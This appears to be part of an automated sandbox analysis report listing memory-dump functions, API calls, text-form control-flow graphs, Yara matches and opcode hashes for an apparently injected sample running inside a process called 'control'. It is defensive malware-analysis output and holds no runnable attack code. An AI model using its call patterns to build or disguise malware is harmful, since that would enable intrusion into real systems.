                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 64f6981dce2b456a7bf109d94cad2afeb3ea369062a2ed29e02b2bc9a0621fe1
                                  • Instruction ID: 81e429494a5ad4380d4329ffd607ae90237a0aaa26cb09e0cb29a05357d5968d
                                  • Opcode Fuzzy Hash: 64f6981dce2b456a7bf109d94cad2afeb3ea369062a2ed29e02b2bc9a0621fe1
                                  • Instruction Fuzzy Hash: 8B900225221400032705B558070450700968BD6755355C021F101E660CD621DD616125
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2220dc27cf370f9369bb30dffdea4f99a8ea2767898f3a8d07061b2f2a6676ee
                                  • Instruction ID: 303b55a1aa2bf15e0abc75ced625435ca66e94ada14e6271f2e5a4c3d79157e7
                                  • Opcode Fuzzy Hash: 2220dc27cf370f9369bb30dffdea4f99a8ea2767898f3a8d07061b2f2a6676ee
                                  • Instruction Fuzzy Hash: 1D90023121140802F7807158440464A00558BD2705F95C015B002E764DCA15DF5977A5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9486f4b962160e8f5aba5a6124ae39780ca64de2fdf0f917a7aa560dab96227d
                                  • Instruction ID: 519cace7685345e79f54fb7369187630a6a26f15c25d346107686a0fce1fca8b
                                  • Opcode Fuzzy Hash: 9486f4b962160e8f5aba5a6124ae39780ca64de2fdf0f917a7aa560dab96227d
                                  • Instruction Fuzzy Hash: A890023121544842F74071584404A4600658BD1709F55C011B006D7A4D9625DE55B665
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 892ffdab1c9267dab654ed666d08b46fcf12f5fb39ed69cb9291efdc439a432c
                                  • Instruction ID: 173719ace1715a4094375c4e11dba245aadbb6de7c74ea31c1b25427ffa26e1c
                                  • Opcode Fuzzy Hash: 892ffdab1c9267dab654ed666d08b46fcf12f5fb39ed69cb9291efdc439a432c
                                  • Instruction Fuzzy Hash: CF90026121240003670571584414616405A8BE1605B55C021F101D6A0DC525DD917129
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c9f76c745e79497a7392bedae189e8811826b5b7879196b7e0bed71cfa3e1dd7
                                  • Instruction ID: dc52a33a2667bf8b819ecdae9022ba5bd4ad9dbf16d60a95b1db640feb4b1fd2
                                  • Opcode Fuzzy Hash: c9f76c745e79497a7392bedae189e8811826b5b7879196b7e0bed71cfa3e1dd7
                                  • Instruction Fuzzy Hash: 4A90023161550402F7007158451470610558BD1605F65C411B042D678D8795DE5175A6

                                   Control-flow Graph (rendered on the page as a figure; its Executed / Not Executed node colouring does not survive extraction. In the text form that follows, each node is "id start-end" annotated with call targets and API names, and "a->b" is an edge)
                                  control_flow_graph 399 2b49050-2b49092 call 2b4bd10 402 2b4916c-2b49172 399->402 403 2b49098-2b490e8 call 2b4bde0 call 2b3acf0 call 2b44e50 399->403 410 2b490f0-2b49101 Sleep 403->410 411 2b49166-2b4916a 410->411 412 2b49103-2b49109 410->412 411->402 411->410 413 2b49133-2b49154 call 2b48e80 412->413 414 2b4910b-2b49131 call 2b48c70 412->414 418 2b49159-2b4915c 413->418 414->418 418->411
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02B490F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 97f5b2742c7a20207df6cd05a41e5c5d838a2148da8c0b3e46eeee33a577d05b
                                  • Instruction ID: 59263e803eea7c844d160a052c3fe068f6c55341191a22d4d1eed60bad805aa1
                                  • Opcode Fuzzy Hash: 97f5b2742c7a20207df6cd05a41e5c5d838a2148da8c0b3e46eeee33a577d05b
                                  • Instruction Fuzzy Hash: CF3181B2900644BBC724DF64C8C5F67B7B9EB48B00F10815DE62A6B245DA70B650CBA8

                                   Control-flow Graph (rendered on the page as a figure; its Executed / Not Executed node colouring does not survive extraction. In the text form that follows, each node is "id start-end" annotated with call targets and API names, and "a->b" is an edge)
                                  control_flow_graph 419 2b49047-2b49092 call 2b4bd10 423 2b4916c-2b49172 419->423 424 2b49098-2b490e8 call 2b4bde0 call 2b3acf0 call 2b44e50 419->424 431 2b490f0-2b49101 Sleep 424->431 432 2b49166-2b4916a 431->432 433 2b49103-2b49109 431->433 432->423 432->431 434 2b49133-2b49154 call 2b48e80 433->434 435 2b4910b-2b49131 call 2b48c70 433->435 439 2b49159-2b4915c 434->439 435->439 439->432
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02B490F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 8daac05ae1746c646018703e97b43ecf0c10a356cdb5ee36d80871430713fd04
                                  • Instruction ID: b3f606de39e9e6adf77e8b5e49a49acc05bd284ce69629b89449f413903f3d0f
                                  • Opcode Fuzzy Hash: 8daac05ae1746c646018703e97b43ecf0c10a356cdb5ee36d80871430713fd04
                                  • Instruction Fuzzy Hash: 5431C1B2900641BBC714DF68CCC5F67B7B8FB48B04F10819DE6296B245DB70B650DBA4

                                   Control-flow Graph (rendered on the page as a figure; its Executed / Not Executed node colouring does not survive extraction. In the text form that follows, each node is "id start-end" annotated with call targets and API names, and "a->b" is an edge)
                                  control_flow_graph 543 2b4a5c6-2b4a5cc 544 2b4a59d-2b4a5a4 543->544 545 2b4a5ce 543->545 546 2b4a5ac-2b4a5c1 call 4d82c70 544->546 547 2b4a5a7 call 2b4af30 544->547 548 2b4a5d0-2b4a5fd call 2b4af30 545->548 549 2b4a64b-2b4a654 545->549 553 2b4a5c3-2b4a5c5 546->553 547->546 551 2b4a65c-2b4a671 RtlFreeHeap 549->551 552 2b4a657 call 2b4af30 549->552 552->551
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B33AF8), ref: 02B4A66D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: c710aa6f81abb34eb9557e97aefccbcadc3a04194c4c20b32b0a075ced58ceab
                                  • Instruction ID: be225cf1b57fdf2c3262af6ebef5e170bccd09bfb336cbc99062e1b1141bde15
                                  • Opcode Fuzzy Hash: c710aa6f81abb34eb9557e97aefccbcadc3a04194c4c20b32b0a075ced58ceab
                                  • Instruction Fuzzy Hash: E4119EBA2042046FDB14EFA8DCD0DEB77A9EF84314B408589FC5987302D630E911DBB0

                                   Control-flow Graph (rendered on the page as a figure; its Executed / Not Executed node colouring does not survive extraction. In the text form that follows, each node is "id start-end" annotated with call targets and API names, and "a->b" is an edge)
                                  control_flow_graph 560 2b4a640-2b4a671 call 2b4af30 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B33AF8), ref: 02B4A66D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 25ebfe95e9534fdfe558201847a369aec7afda8d13a528e7c388ff987336c30a
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 47E01AB12102046BD714EF59CC44EA777ADAF88750F014555BD0857241C630E9108AB0

                                   Control-flow Graph (rendered on the page as a figure; its Executed / Not Executed node colouring does not survive extraction. In the text form that follows, each node is "id start-end" annotated with call targets and API names, and "a->b" is an edge)
                                  control_flow_graph 563 2b38310-2b3833d call 2b4be30 call 2b4c9d0 568 2b38343-2b3835a call 2b44e50 563->568 569 2b3833e call 2b3acf0 563->569 572 2b3838e-2b38392 568->572 573 2b3835c-2b3836e PostThreadMessageW 568->573 569->568 574 2b38370-2b3838b call 2b3a480 PostThreadMessageW 573->574 575 2b3838d 573->575 574->575 575->572
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B3836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B3838B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                  • Instruction ID: 54b2c88fc1b65c456edd5b8e75b5bd642f5ca4a658d687089235435269af4971
                                  • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                  • Instruction Fuzzy Hash: 9A01A731A8122877E721A6949C42FBE776D9B40F50F144155FF04BA1C1EAA4790547F6

                                   Control-flow Graph (rendered on the page as a figure; its Executed / Not Executed node colouring does not survive extraction. In the text form that follows, each node is "id start-end" annotated with call targets and API names, and "a->b" is an edge)
                                  control_flow_graph 578 2b382d3-2b382df 579 2b382e1 578->579 580 2b38337-2b3835a call 2b3acf0 call 2b44e50 578->580 581 2b382eb-2b382fd call 2b4b720 579->581 582 2b382e6 call 2b4b870 579->582 589 2b3838e-2b38392 580->589 590 2b3835c-2b3836e PostThreadMessageW 580->590 582->581 591 2b38370-2b3838b call 2b3a480 PostThreadMessageW 590->591 592 2b3838d 590->592 591->592 592->589
                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B3836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B3838B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 11fb7617b85aa47b16f5f024dcd02188c636c34022a2a31c27493a18eb9d4f5a
                                  • Instruction ID: 6c8085a433361cb7a4c2e3384de1d478428febf8cb79fc962a77ba511f00661d
                                  • Opcode Fuzzy Hash: 11fb7617b85aa47b16f5f024dcd02188c636c34022a2a31c27493a18eb9d4f5a
                                  • Instruction Fuzzy Hash: 1F017D32A4022932EB2266743C42FFA730C9B01F64F0401E5FE04EB2C0EA91F50556E3
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B3AD62
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: f748f176b8dfe33b72b187a63c487b8f41e666cd93d9fa76fbe54b9981629965
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: 2D011EB5E0020DBBDB10EAE4DC81F9DB7799B54708F1045E5E94897241FA31EB14DB91
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B4A704
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 7b49a99931ad2f049d45eef54a0a5772e9f4f0e6ed0a9cfa590843b57ff0d4b8
                                  • Instruction ID: 3f92d026cb825f6e2613d352cdadeee52a2d5e8945fb80d728f5bdb4c98b4138
                                  • Opcode Fuzzy Hash: 7b49a99931ad2f049d45eef54a0a5772e9f4f0e6ed0a9cfa590843b57ff0d4b8
                                  • Instruction Fuzzy Hash: 3901AFB2215108ABCB54DF89DC80EEB37ADAF8C754F158258FE0D97241C630E851CBA0
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B4A704
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: 1d7fc88aabe07ca1dcf5b66e88194fcc7617f3d1e63060890281a64ea58a770c
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 4101B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B3F050,?,?,00000000), ref: 02B491BC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                  • Instruction ID: bd1854f4514b7f6ec0713e1899570e46b57b26338e4521b3c07e5971db338ba7
                                  • Opcode Fuzzy Hash: c93d5144655a98af27dd9d7755c423c6bc5848ccb9f33eb30c3b4f92d4cc5cda
                                  • Instruction Fuzzy Hash: AAE092373903043AE3306999AC42FA7B39CCB81B60F14006AFA4DEB2C0D995F44146E4
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02B44536,?,02B44CAF,02B44CAF,?,02B44536,?,?,?,?,?,00000000,00000000,?), ref: 02B4A62D
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 32e21e6d0a82522bed167e9b5e4d2873307510b5087c1c47a31221bf81a3f655
                                  • Instruction ID: 6cd440622f1d77cdfaf58015502fe1dc7079747c3eea86a92f0842838cfeb2b7
                                  • Opcode Fuzzy Hash: 32e21e6d0a82522bed167e9b5e4d2873307510b5087c1c47a31221bf81a3f655
                                  • Instruction Fuzzy Hash: C0E0867614A1982AEB14B7E43DD14F77F1CCAC51297184AEAFA8C9D507C835911193A1
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02B44536,?,02B44CAF,02B44CAF,?,02B44536,?,?,?,?,?,00000000,00000000,?), ref: 02B4A62D
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: 04075f397aeb4a01c0f20f801cffd2f8a6b6f51e7e1fa8d327f53f35cdf72b1f
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: A2E01AB1210204ABD714EF59CC40EA777ADAF88654F114559BE085B241C530F9118BB0
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B3F1D2,02B3F1D2,?,00000000,?,?), ref: 02B4A7D0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,02B38D14,?), ref: 02B3F6FB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,02B38D14,?), ref: 02B3F6FB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  APIs
                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,-00000002,00000000), ref: 0087395A
                                  • StrCmpICW.SHLWAPI(-00000002,PANEL), ref: 00873971
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,/name,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AA4B
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,-name,?,?), ref: 0087AA5B
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,/page,00000000,?,?), ref: 0087AA9D
                                    • Part of subcall function 0087A9EC: StrCmpICW.SHLWAPI(00000000,-page,?,?), ref: 0087AAAD
                                    • Part of subcall function 0087A9EC: CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0(?,?,-00000002,-00000004,-00000002,?,Shell32.dll,Control_RunDLL ,-00000002,?,?), ref: 0087AAE7
                                  • CompareStringOrdinal.KERNEL32(?,000000FF,Microsoft.System,000000FF,00000001,?,?), ref: 008739BC
                                  • CompareStringOrdinal.KERNEL32(?,000000FF,{BB06C0E4-D293-4f75-8A90-CB05B6477EEE},000000FF,00000001,?,?), ref: 008739D9
                                  • CoTaskMemFree.API-MS-WIN-CORE-COM-L1-1-0(?,?,?), ref: 00873A15
                                  • StrCmpICW.SHLWAPI(00871020,-00000002,?,?), ref: 00873A43
                                  • IsOS.SHLWAPI(FFFFFFFF,?,?), ref: 00873A56
                                  • CompareStringOrdinal.KERNEL32(008719E8,000000FF,Microsoft.System,000000FF,00000001,?,?), ref: 00873A8F
                                    • Part of subcall function 0087AD62: CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002,-00000002,?,?), ref: 0087AD74
                                    • Part of subcall function 0087AD62: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00871428,00000000,00000001,00871900,?,00000000,?,?), ref: 0087AD91
                                    • Part of subcall function 0087AD62: CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 0087ADCD
                                  • StrCmpICW.SHLWAPI(NETCONNECTIONS,-00000002,?,?), ref: 00873B6C
                                  • StrCmpICW.SHLWAPI(ncpa.cpl,-00000002,?,?), ref: 00873B80
                                  • lstrlenW.KERNEL32(?,?,?,?), ref: 00873BCA
                                  • AllowSetForegroundWindow.USER32(000000FF), ref: 00873C32
                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00873C3F
                                  • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00873CF3
                                  • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00871428,00000000,00000001,00871900,?), ref: 00873D14
                                  • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00873D54
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CompareOrdinalString$CreateFreeInitializeInstanceTaskUninitialize$AllowExecuteForegroundHeapInformationShellWindowlstrlen
                                  • String ID: %SystemRoot%\system32\rundll32.exe$%s%s$%s%s %s$%s\%s%s$::{7007ACC7-3202-11D1-AAD2-00805FC1270E}$<$Microsoft.System$NETCONNECTIONS$PANEL$Shell32.dll,Control_RunDLL $ncpa.cpl$open${BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
                                  • API String ID: 2671181447-2540027045
                                  APIs
                                  • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 008747A2
                                  • GetCurrentProcessId.KERNEL32 ref: 008747B1
                                  • GetCurrentThreadId.KERNEL32 ref: 008747BA
                                  • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 008747C3
                                  • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 008747D8
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  APIs
                                  • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00874426,00871000), ref: 008742F7
                                  • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00874426,?,00874426,00871000), ref: 00874300
                                  • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00874426,00871000), ref: 0087430B
                                  • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00874426,00871000), ref: 00874312
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                  • String ID:
                                  • API String ID: 3231755760-0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0087C510,0087C510,00879694,00000000,00000000,0087C49C,?,00879540,0087C550,?,00879642,00000000,0087C474,0087C470), ref: 008772D3
                                  • HeapAlloc.KERNEL32(00000000,?,00879540,0087C550,?,00879642,00000000,0087C474,0087C470,?,00878A6D,0087C550,00000008,?,00875F7C,0087C550), ref: 008772DA
                                  • GetProcessHeap.KERNEL32(00000000,0087C49C,?,00879540,0087C550,?,00879642,00000000,0087C474,0087C470,?,00878A6D,0087C550,00000008,?,00875F7C), ref: 008772ED
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: true
                                   • Associated: 00000008.00000002.4517839714.000000000087D000.00000040.80000000.00040000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_870000_control.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc
                                  • String ID:
                                  • API String ID: 651230671-0
                                  APIs
